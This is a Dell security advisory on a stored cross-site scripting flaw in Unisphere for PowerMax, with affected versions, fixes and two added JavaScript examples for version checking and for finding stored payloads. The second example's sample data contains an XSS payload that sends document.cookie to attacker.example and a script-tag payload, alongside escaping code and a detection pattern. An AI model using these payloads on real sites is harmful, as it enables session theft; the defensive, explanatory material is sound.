DSA-2020-277: Dell EMC Unisphere PowerMax Cross-Site Scripting (XSS) Vulnerability
Summary: Dell EMC Unisphere PowerMax contains remediation for a Cross-Site Scripting (XSS) Vulnerability that could be exploited by malicious users to compromise the affected system.
Impact
Medium
Details
| Proprietary Code CVE(s) | Description | CVSS Base Score | CVSS Vector String |
| CVE-2020-35170 | Dell EMC Unisphere for PowerMax versions prior to 9.1.0.24 contain a Stored Cross-Site Scripting vulnerability. A remote, authenticated attacker could potentially exploit this vulnerability to store malicious HTML or JavaScript code in a trusted application data store. When a victim user accesses the data store through their browser, the malicious code is executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery. | 6.3 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
Affected Products & Remediation
| Product | Affected Version(s) | Updated Version(s) | Link to Update |
| Unisphere for PowerMax | Versions prior to 9.1.0.24 | 9.1.0.24 (EEM: 9.1.0.853) | https://www.dell.com/support/home/en-us/product-support/product/unisphere-powermax/drivers |
| Unisphere for PowerMax | Versions prior to 9.2.0.6 | 9.2.0.6 (EEM: 9.2.0.1018) | https://www.dell.com/support/home/en-us/product-support/product/unisphere-powermax/drivers |
| PowerMax OS | 5978 | 5978 | Request OPT 577141; Request OPT 576388 |
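The two Unisphere rows in the table above describe separate release trains, so a 9.2.0.x build has to be compared against 9.2.0.6 rather than 9.1.0.24, even though 9.2.0.5 is numerically "after" 9.1.0.24. The JavaScript below is an added example, not Dell tooling, that applies that reading to a version string. The assumptions that 9.0.x and older fall under the first row and that trains newer than 9.2 are out of the advisory's scope are made here and are not stated on the page; the EEM build numbers are recorded but not compared.

```javascript
// Added example (not Dell code): classify a Unisphere for PowerMax version
// string against the affected ranges in DSA-2020-277.
// Assumption: each table row is one release train. 9.2.x is judged against
// 9.2.0.6; 9.1.x and anything older is judged against 9.1.0.24 (the first row
// says "prior to 9.1.0.24", which covers 9.0.x as well). Trains newer than 9.2
// are not covered by this advisory, so they are reported as "not listed".
const FIXED_BUILDS = {
  "9.1": { build: [9, 1, 0, 24], eem: "9.1.0.853" },
  "9.2": { build: [9, 2, 0, 6], eem: "9.2.0.1018" },
};

// Unisphere versions on the page are four dotted integers (e.g. 9.1.0.24).
function parseVersion(s) {
  const parts = String(s).trim().split(".");
  if (parts.length !== 4 || parts.some((p) => !/^\d+$/.test(p))) {
    throw new Error(`unrecognised Unisphere version string: ${s}`);
  }
  return parts.map(Number);
}

// Numeric, component-wise comparison (string comparison would rank
// 9.1.0.9 above 9.1.0.24, which is exactly the mistake to avoid).
function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Pick the fixed build for the train the version belongs to, or null if the
// train is newer than anything the advisory lists.
function fixedBuildFor(v) {
  if (v[0] > 9 || (v[0] === 9 && v[1] >= 3)) return null;
  if (v[0] === 9 && v[1] === 2) return FIXED_BUILDS["9.2"];
  return FIXED_BUILDS["9.1"];
}

function assessUnisphereVersion(s) {
  const v = parseVersion(s);
  const fixed = fixedBuildFor(v);
  if (fixed === null) {
    return {
      version: s, affected: null, updateTo: null,
      reason: "release train not listed in DSA-2020-277; consult later advisories",
    };
  }
  const target = fixed.build.join(".");
  const affected = compareVersions(v, fixed.build) < 0;
  return {
    version: s, affected,
    updateTo: affected ? target : null,
    reason: affected ? `below fixed build ${target} (EEM ${fixed.eem})` : `at or above fixed build ${target}`,
  };
}

// Run over a list of installed versions and return only the ones that still
// need the update (an inventory export is the realistic input here).
function affectedInstances(versions) {
  return versions.map(assessUnisphereVersion).filter((r) => r.affected === true);
}

// Constructed sample inventory, not data from the advisory.
const SAMPLE_INVENTORY = ["9.1.0.20", "9.1.0.24", "9.2.0.5", "9.2.0.6", "9.0.2.11"];
console.log(affectedInstances(SAMPLE_INVENTORY));
```

Treat an `affected: null` result as "check a newer advisory", not as "fixed"; the advisory only makes a statement about the 9.1 and 9.2 trains it lists.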
Workarounds & Mitigations
Any chart or dashboard that contains a stored cross-site scripting payload must be deleted to remove the stored XSS. Deleting stored content only addresses payloads that are already present; the fix itself is the updated version listed under Affected Products & Remediation.
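The workaround above requires finding which stored charts or dashboards carry a payload. The JavaScript below is an added example, not Unisphere code: it shows the stored-XSS pattern the advisory describes (attacker-controlled text saved in a trusted data store and later spliced into HTML), the output-encoded rendering that neutralises it, and a triage pass over stored names that produces a candidate list for deletion. The data-store shape, field names and sample entries are constructed for this example and do not reflect how Unisphere stores dashboards.

```javascript
// Added example (not Unisphere code). Illustrates the stored-XSS class in
// DSA-2020-277 and a triage pass over stored chart/dashboard names.

// Constructed sample data store; the shape is an assumption for this example.
const STORED_DASHBOARDS = [
  { id: 1, owner: "alice", name: "Capacity overview" },
  { id: 2, owner: "bob", name: "<img src=x onerror=\"fetch('//attacker.example/?c='+document.cookie)\">" },
  { id: 3, owner: "carol", name: "Latency <script>alert(document.domain)</script>" },
  { id: 4, owner: "dave", name: "Tier 1 & 2 <= 10ms" }, // legitimate text that merely looks like markup
];

// Vulnerable rendering: the stored name is spliced straight into HTML, so the
// markup in entries 2 and 3 becomes live DOM in every viewer's browser, running
// with that viewer's session (the "session theft" outcome in the advisory).
function renderTitleUnsafe(name) {
  return `<h2 class="dashboard-title">${name}</h2>`;
}

// Hardened rendering: escape the characters that can change HTML context.
// The stored text is still attacker-controlled; it just cannot become markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderTitleSafe(name) {
  return `<h2 class="dashboard-title">${escapeHtml(name)}</h2>`;
}

// Triage heuristic: flag stored names containing an HTML tag, an inline event
// handler, or a javascript: URL. Entry 4 contains "<" but no tag, so it is not
// flagged. This is a review list for the deletion workaround, not an
// auto-delete rule; a human confirms each hit.
const TAG_OR_HANDLER = /<\s*\/?[a-z][^>]*>|\bon[a-z]+\s*=|javascript:/i;

function findStoredXss(dashboards) {
  return dashboards
    .filter((d) => TAG_OR_HANDLER.test(d.name))
    .map((d) => ({ id: d.id, owner: d.owner, excerpt: d.name.slice(0, 60) }));
}

console.log("candidates for deletion:", findStoredXss(STORED_DASHBOARDS));
console.log("unsafe:", renderTitleUnsafe(STORED_DASHBOARDS[1].name));
console.log("safe:  ", renderTitleSafe(STORED_DASHBOARDS[1].name));
```

The `owner` field in the candidate list matters for response: the advisory requires an authenticated attacker, so the account that created a flagged chart or dashboard is the one to investigate.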
Revision History
| Revision | Date | Description |
| 1.0 | 2020-12-14 | Initial Release |
Acknowledgements
Dell would like to thank Tomasz Stachowicz and Przemek Nowakowski for reporting this issue.
Affected Products
PowerMaxOS 5978, Unisphere for PowerMax
Article Properties
Article Number: 000181212
Article Type: Dell Security Advisory
Last Modified: 17 Dec 2020